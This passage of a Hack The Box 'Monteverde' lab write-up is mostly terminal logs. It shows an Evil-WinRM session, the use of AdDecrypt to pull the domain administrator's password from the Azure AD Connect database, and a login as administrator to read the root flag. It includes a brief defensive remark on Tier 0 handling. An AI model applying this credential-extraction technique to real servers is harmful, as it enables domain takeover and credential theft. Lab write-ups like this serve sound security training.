    + CategoryInfo          : ObjectNotFound: (get:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> download RoamingCredentialSettings.xml
                                        
Info: Downloading C:\users\all users\Microsoft\uEV\InboxTemplates\RoamingCredentialSettings.xml to RoamingCredentialSettings.xml                                                                      
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> 

nothing much in that file; it is just the stock UE-V template listing which credential folders under the user profile roam

└─$ cat RoamingCredentialSettings.xml
<?xml version="1.0" encoding="utf-8"?>
<!--
Modifying the settings location templates for an application or a 
Windows setting group provided with Microsoft User Experience Virtualization 
may cause synchronization for the modified settings to fail. 
For more information about settings location templates please see 
the UE-V product documentation.  http://go.microsoft.com/fwlink/?LinkId=260889
-->

<SettingsLocationTemplate xmlns='http://schemas.microsoft.com/UserExperienceVirtualization/2013/SettingsLocationTemplate'>
  <!-- Roaming Credential settings -->
  <Name>Roaming Credential Settings</Name>
  <ID>RoamingCredentialSettings</ID>
  <LocalizedNames>
    <Name Locale='en-us'>Roaming Credential Settings</Name>
    <Name Locale='cs-cz'>Nastavení cestovních přihlašovacích údajů</Name>
    <Name Locale='da-dk'>Indstillinger for roaminglegitimationsoplysninger</Name>
    <Name Locale='de-de'>Einstellungen für servergespeicherte Anmeldeinformationen</Name>
    <Name Locale='el-gr'>Ρυθμίσεις διαπιστευτηρίων περιαγωγής</Name>
    <Name Locale='es-es'>Configuración de credenciales móviles</Name>
    <Name Locale='fi-fi'>Verkkovierailutunnistetietojen asetukset</Name>
    <Name Locale='fr-fr'>Paramètres d’informations d’identification itinerants</Name>
    <Name Locale='hu-hu'>Hordozható hitelesítőadat-beállítások</Name>
    <Name Locale='it-it'>Impostazioni per le credenziali di roaming</Name>
    <Name Locale='ja-jp'>移動資格情報の設定</Name>
    <Name Locale='ko-kr'>로밍 자격 증명 설정</Name>
    <Name Locale='nb-no'>Innstillinger for sentrallegitimasjon</Name>
    <Name Locale='nl-nl'>Referentie-instellingen voor roaming</Name>
    <Name Locale='pl-pl'>Ustawienia poświadczeń mobilnych</Name>
    <Name Locale='pt-br'>Configurações de Credenciais de Roaming</Name>
    <Name Locale='pt-pt'>Definições de Credencial de Roaming</Name>
    <Name Locale='ru-ru'>Параметры перемещаемых учетных данных</Name>
    <Name Locale='sk-sk'>Nastavenia zdieľania poverení</Name>
    <Name Locale='sl-si'>Nastavitve poverilnic za gostovanje</Name>
    <Name Locale='sv-se'>Autentiseringsinställningar för nätverksväxling</Name>
    <Name Locale='tr-tr'>Dolaşım Kimlik Bilgileri Ayarları</Name>
    <Name Locale='zh-cn'>漫游凭据设置</Name>
    <Name Locale='zh-tw'>漫遊認證設定</Name>
  </LocalizedNames>
  <Version>0</Version>
  <DeferToMSAccount/>
  <Processes>
    <ShellProcess/>
  </Processes>

  <Settings>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Credentials</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Crypto</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Protect</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\SystemCertificates</Path>
    </File>
  </Settings>
</SettingsLocationTemplate>                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

The box runs Azure AD Connect (the AAD_ synchronization service account, the Azure Admins group and the azure_uploads share all pointed at it), and the Azure AD Connect database credential extraction described in the post below works for privesc: the sync service keeps the credentials of the on-prem AD account it synchronizes with in its local database, and they can be decrypted from a session on the server. From the defensive side, this is why the Azure AD Connect server should be treated as a Tier 0 asset and logon to it restricted to the same extent as a domain controller.

Link https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

Command to run (quoted from the post linked above):

AdDecrypt.exe -FullSQL

"This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e cd “C:\Program Files\Microsoft Azure AD Sync\Bin”), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll from the download link is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error"

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\ADdecrypt\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> 

trying evil-winrm with the decrypted administrator credentials and reading root.txt

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u administrator -p d0m@in4dminyeah!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f77447ffe7a3e4cb40da45e8d46202ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>